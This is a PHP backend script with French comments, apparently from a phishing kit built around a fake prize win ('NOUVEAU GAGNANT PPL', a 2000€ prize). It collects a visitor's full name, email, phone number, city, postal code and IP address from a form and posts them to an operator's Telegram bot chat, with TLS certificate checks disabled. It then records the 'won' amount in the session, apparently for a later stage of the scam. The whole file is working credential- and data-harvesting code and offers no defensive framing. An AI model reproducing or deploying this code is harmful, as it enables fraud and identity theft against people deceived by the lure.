<?php


require_once 'config.php';
session_start();
 
$tgBotToken = $config['tg_bot_token'];
$tgchatid = $config['tg_chat_id'];


$ip = $_SERVER['REMOTE_ADDR'];

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Récupérer les données du formulaire
    $fullname = $_POST['fullname'] ?? 'Non spécifié';
    $email = $_POST['email'] ?? 'Non spécifié';
    $phone = $_POST['phone'] ?? 'Non spécifié';
    $city = $_POST['city'] ?? 'Non spécifié';
    $zipcode = $_POST['zipcode'] ?? 'Non spécifié';
    $prize = $_POST['prize'] ?? '2000€';
    

    $botToken = $tgBotToken;  
    $chatId =  $tgchatid;  
    
    // Préparer le message
    $message = "🎉 NOUVEAU GAGNANT PPL 🎉\n\n";
    $message .= "Nom: $fullname\n";
    $message .= "Email: $email\n";
    $message .= "Téléphone: $phone\n";
    $message .= "Ville: $city\n";
    $message .= "Code postal: $zipcode\n";
    $message .= "Prix gagné: $prize\n";
    $message .= "Date: " . date('d/m/Y H:i:s') . "\n";
    $message .= "IP : " . $ip . "\n";
    
    // URL de l'API Telegram
    $telegramApiUrl = "https://api.telegram.org/bot$botToken/sendMessage";
    
    // Paramètres de la requête
    $parameters = [
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'HTML'
    ];
    
    // Initialiser cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $telegramApiUrl);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $parameters);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

    
    // Exécuter la requête
    $response = curl_exec($ch);
    curl_close($ch);
    
    $prize = str_replace('€', '', $prize);
    $_SESSION['montant'] = $prize;
    // Répondre avec un statut de succès
    header('Content-Type: application/json');
    echo json_encode(['success' => true]);
    exit;
} else {
    // Si ce n'est pas une requête POST, renvoyer une erreur
    header('HTTP/1.1 405 Method Not Allowed');
    header('Content-Type: application/json');
    echo json_encode(['success' => false, 'message' => 'Method not allowed']);
    exit;
}
?>